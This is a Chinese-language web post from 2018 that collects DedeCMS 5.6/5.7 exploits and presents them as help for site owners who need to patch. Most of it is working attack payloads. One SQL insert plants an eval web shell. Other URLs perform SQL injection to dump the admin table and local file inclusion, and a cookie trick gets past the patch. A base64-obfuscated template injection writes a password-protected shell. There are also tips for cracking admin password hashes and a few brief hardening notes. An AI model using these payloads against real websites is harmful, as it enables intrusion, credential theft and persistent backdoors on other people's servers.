POST TIME:2018-02-04 22:25
最近織夢dedecms網站管理系統(tǒng)的漏洞經常的出現(xiàn),導致使用dedecms程序建站的朋友很是老火,怎么才能保證自己的網站不會被入侵呢。下面dedecms模板中心收集了織夢Dedecms V5.6/V5.7漏洞問題,大家保參考然后進行修補吧。
DedeCms v5.6-5.7 最新漏洞 拿 WebShell EXP (5.18)
前題條件,必須準備好自己的dede數(shù)據(jù)庫,然后插入數(shù)據(jù):
以下是引用片段:
代碼如下 | |
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", 'a');@fwrite($fp, '<?php eval($_POST[c]) ?>');echo "OK";@fclose($fp);{/dede:php}'); |
再用下面表單提交,shell 就在同目錄下 1.php。原理自己研究。。。
以下是引用片段:
代碼如下 | |
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();"> |
此問題官方還沒有解決辦法,個人建義刪除mytag_js.php文件,并把數(shù)據(jù)表中的XX_mytag表的中的text類開的字段修改,并且限制最多為1字節(jié),如果你不使用這個功能。
DedeCms V5.6注入+本地包含0day
一、advancedsearch.php注入0day
代碼如下 | |
plus/advancedsearch.php |
$sql 變量未初始化。導致雞助注入。
原理不多說自已百度去,直接EXP:
代碼如下 | |
http://www.xxx.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` |
dede的密碼破解方法是32位MD5減去頭5位,減去尾七位,得到20MD5密碼,方法是,前減3后減1,得到16位MD5。
二、carbuyaction.php本地包含雞助0day
漏洞文件:plus/carbuyaction.php
還是原理不多說自已百度去,直接EXP:
代碼如下 | |
http://www.xxx.com/plus/carbuyaction.php?dopost=return&code=../../ |
如果打了補丁在cookie中加上code=alipay繼續(xù)使用。
再暴一個BUG,直接訪問:
代碼如下 | |
http://www.dedecms.com/plus/carbuyaction.php?dopost=return&dsql=xx |
暫時沒什么利用價植,BUG一個。
DedeCms v5.6 惡意代碼執(zhí)行漏洞
影響版本:
DedeCms v5.6漏洞描述:
在上傳軟件的地方,對本地地址沒有進行有效的驗證,可以被惡意利用
測試方法:
注冊會員,上傳軟件:本地地址中填入
代碼如下 | |
a{/dede:link}{dede:toby57 name="'']=0;phpinfo();//"}x{/dede:toby57}, |
發(fā)表后查看或修改即可執(zhí)行
代碼如下 | |
a{/dede:link}{dede:toby57 name="'']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57} |
生成x.php 密碼:xiao直接生成一句話。密碼xiao 大家懂得SEBUG安全建議:
廠商補丁:
DEDECMS
目前廠商還沒有提供補丁或者升級程序,我們建議使用此軟件的用戶隨時關注廠商的主頁以獲取最新版本
個人教訓:我們可把upload,data目錄設置不可執(zhí)行和php文件,plus目錄設置不要寫任何文件,把不要的文件刪除,模板目錄最好也不可以上傳和修改任何文件。